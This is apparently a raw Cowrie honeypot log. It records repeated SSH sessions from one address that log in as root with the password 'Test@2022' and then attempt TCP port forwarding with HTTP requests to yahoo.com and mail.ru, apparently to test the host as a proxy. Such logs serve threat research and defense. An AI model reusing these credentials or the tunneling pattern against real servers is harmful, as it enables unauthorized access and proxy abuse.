{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24352,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24352","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.495958Z","session":"ec216fd1af02"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.545634Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.596034Z","src_ip":"77.83.207.83","session":"ec216fd1af02"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26977,"dst_ip":"1.2.3.4","dst_port":22,"session":"deb4909a5fbb","protocol":"ssh","message":"New connection: 77.83.207.83:26977 (1.2.3.4:22) [session: deb4909a5fbb]","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.644746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.654771Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.694585Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.941999Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21436,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21436","sensor":"my-vps","timestamp":"2025-08-31T03:51:52.992460Z","session":"deb4909a5fbb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.042130Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.session.closed","duration":12.774316310882568,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.135910Z","src_ip":"212.227.235.229","session":"ccaaa1113d97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":13664,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:13664","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.196026Z","session":"deb4909a5fbb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.245833Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59604,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8a323683ee8","protocol":"telnet","message":"New connection: 212.227.235.229:59604 (1.2.3.4:23) [session: b8a323683ee8]","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.347683Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":22080,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22080","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.388220Z","session":"deb4909a5fbb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.438255Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.489145Z","src_ip":"77.83.207.83","session":"deb4909a5fbb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27083,"dst_ip":"1.2.3.4","dst_port":22,"session":"a862c04961db","protocol":"ssh","message":"New connection: 77.83.207.83:27083 (1.2.3.4:22) [session: a862c04961db]","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.538111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.548465Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.588248Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.836533Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11634,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11634","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.887895Z","session":"a862c04961db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:53.938125Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14530,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14530","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.080139Z","session":"a862c04961db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.130187Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":16868,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16868","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.272147Z","session":"a862c04961db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.322030Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.372898Z","src_ip":"77.83.207.83","session":"a862c04961db"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27167,"dst_ip":"1.2.3.4","dst_port":22,"session":"38b1c58d9f7b","protocol":"ssh","message":"New connection: 77.83.207.83:27167 (1.2.3.4:22) [session: 38b1c58d9f7b]","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.421597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.422717Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.472591Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.720895Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19034,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19034","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.771934Z","session":"38b1c58d9f7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.821895Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":15256,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15256","sensor":"my-vps","timestamp":"2025-08-31T03:51:54.964232Z","session":"38b1c58d9f7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.014282Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":9508,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9508","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.156228Z","session":"38b1c58d9f7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.206043Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.256636Z","src_ip":"77.83.207.83","session":"38b1c58d9f7b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27285,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f222141b0ed","protocol":"ssh","message":"New connection: 77.83.207.83:27285 (1.2.3.4:22) [session: 1f222141b0ed]","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.307775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.316943Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.360196Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.620596Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24765,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24765","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.674142Z","session":"1f222141b0ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.726539Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":29914,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29914","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.874449Z","session":"1f222141b0ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:55.926824Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":4093,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4093","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.074821Z","session":"1f222141b0ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.127271Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.180272Z","src_ip":"77.83.207.83","session":"1f222141b0ed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":27389,"dst_ip":"1.2.3.4","dst_port":22,"session":"af8050ba3df1","protocol":"ssh","message":"New connection: 77.83.207.83:27389 (1.2.3.4:22) [session: af8050ba3df1]","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.228905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.230054Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:56.279624Z","src_ip":"77.83.207.83","session":"af8050ba3df1"}
